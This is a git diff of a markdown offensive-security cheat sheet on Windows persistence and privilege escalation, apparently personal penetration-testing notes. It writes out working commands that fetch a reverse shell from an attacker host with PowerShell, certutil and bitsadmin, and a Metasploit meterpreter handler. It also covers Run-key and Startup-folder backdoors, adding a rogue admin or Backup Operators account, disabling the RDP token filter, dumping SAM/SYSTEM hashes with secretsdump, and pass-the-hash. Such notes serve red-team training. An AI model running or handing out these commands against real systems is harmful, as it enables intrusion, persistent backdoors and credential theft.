clean up

Persistence/persistence.md

@@ -11,30 +11,49 @@
     * RDP
 
 ## Gain Persistence on Windows
-* Browser. Add to trusted sites.
-* Powershell
+
+### Internet Explorer 
+
+Open the Internet Explorer Browser and add a malicious URL to trusted sites.
+The now trusted URLs could be shell or any other file that can be downloaded via the browser now.
+
+### Powershell
+
+Open Powershell and download the reverse shell via
 ```sh
 Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
 ```
-* DOSprompt
-```cmd
+
+### CMD.exe
+
+Open cmd.exe and download the reverse shell via
+```sh
 certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
 ```
-* Use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp` 
+
+* In Metasploit use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp` 
+
 ### Paths to Persistence
+
 * Put in startup directory
 ```sh
 C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
 ```
-* Put the reverse_shell into `%appdata%` and add a registry key
+
+* Put the reverse shell into `%appdata%` and add a registry key
 ```sh
 reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe" 
 ```
+
 ### Background Intelligence Transfer Service (BITS)
+
+BITS is a background process included in Windows to transfer data (files) between machines while the system is on idle. 
+The bitsadmin can be used directly via Powershell or cmd.exe to transfer malicious files.
 ```sh
 bitsadmin /create __shell__
 bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
 ```
+
 ```sh
 bitsadmin /SetNotifyCmdLine 1 cmd.exe  "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
 bitsadmin /SetMinRetryDelay 30
@@ -42,27 +61,33 @@ bitsadmin /resume
 ```
 
 ## Elevate Privileges
-* Create user `net user /add <user> <pass>`
-* Add to admin group via `net localgroup administrators <user> /add` 
-* Check `net localgroup Administrator`
 
-### More stealthy
+Create user `net user /add <user> <pass>`.
+Add the user to the administrators group via `net localgroup administrators <user> /add`.
+Assert the result via `net localgroup Administrator`
+
+### More stealthy methods
+
+`Backup Operator` group is more stealthy method than using the administrators group.
+The following two groups are assigned through membership of `Backup Operators`
+* `SeBackupPrivilege`, read files
+* `SeRestorePrivilege`, write files
 
-* Backup Operator group is more stealthy, no admin by r/w on files
 ```sh
 net localgroup "Backup Operators" <user> /add
 net localgroup "Remote Management Users" <user> /add
 ```
-* The following two groups are assigned through membership of `Backup Operators`
-    * SeBackupPrivilege, read files
-    * SeRestorePrivilege, write files
 
-* Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via
+#### RDP
+
+An RDP login gets special treatment. Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via
 ```sh
 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
 ```
-* Afterwards, check if `Backup Operators` is enabled via `whoami /groups`
-* Backup `SAM` and `SYSTEM` via 
+
+Afterwards, check if `Backup Operators` is enabled via `whoami /groups`.
+Backup `SAM` and `SYSTEM` via 
+
 ```sh
 reg save hklm\system system.bak
 reg save hklm\sam sam.bak
@@ -70,7 +95,8 @@ download system.bak
 download sam.bak
 secretsdump.py -sam sam.bak -system system.bak LOCAL
 ```
-* Pass-the-hash via evil-winrm
+
+Found hashes inside the dump can be used to Pass-the-hash via evil-winrm
 
 ### secedit